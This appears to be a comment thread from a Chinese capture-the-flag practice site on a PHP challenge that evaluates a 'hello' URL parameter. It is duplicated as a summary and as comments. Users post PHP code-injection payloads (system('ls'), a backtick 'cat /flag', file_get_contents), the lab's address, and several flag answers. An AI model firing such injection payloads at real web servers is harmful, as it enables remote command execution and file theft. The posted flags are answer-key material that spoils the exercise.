../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php
flag{4cadd25b49840f0cdb999cdabc86b103}
flag{21ebfdf5494104f4f54eca2bdd3cb902}
http://114.67.175.224:14089//?hello=file('flag.php') flag{1c587b72b36adc6efad7f93dce06182f}
/?hello=show_source("./flag.php")
读懂php发现页面会执行在hello后面的语句,并且var_dump是PHP语言中的一个函数,用于打印变量的相关信息,在url后加/?hello=file('flag.php')会将flag文件中的文件打印出来,即可得到flag
/?hello=(`cat%20/flag`)
在url后加/?hello=file('flag.php')即可得到flag
直接在url后面加?hello=var_dump(file_get_contents("flag.php"))
flag{ef6d4343155d2fc70bd72b9bd95f6229}
...
评论
马踏黄河两岸 11月前
举报
../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php
lilifanqian 1年前
举报
flag{4cadd25b49840f0cdb999cdabc86b103}
18843672580 1年前
举报
flag{21ebfdf5494104f4f54eca2bdd3cb902}
鸡你太美 1年前
举报
http://114.67.175.224:14089//?hello=file('flag.php') flag{1c587b72b36adc6efad7f93dce06182f}
啵咯啵咯 1年前
举报
/?hello=show_source("./flag.php")
deger 1年前
举报
读懂php发现页面会执行在hello后面的语句,并且var_dump是PHP语言中的一个函数,用于打印变量的相关信息,在url后加/?hello=file('flag.php')会将flag文件中的文件打印出来,即可得到flag
coo1an 1年前
举报
/?hello=(`cat%20/flag`)
大哥大 1年前
举报
在url后加/?hello=file('flag.php')即可得到flag
falg 1年前
举报
直接在url后面加?hello=var_dump(file_get_contents("flag.php"))
栗深林兮惊层颠 1年前
举报
flag{ef6d4343155d2fc70bd72b9bd95f6229}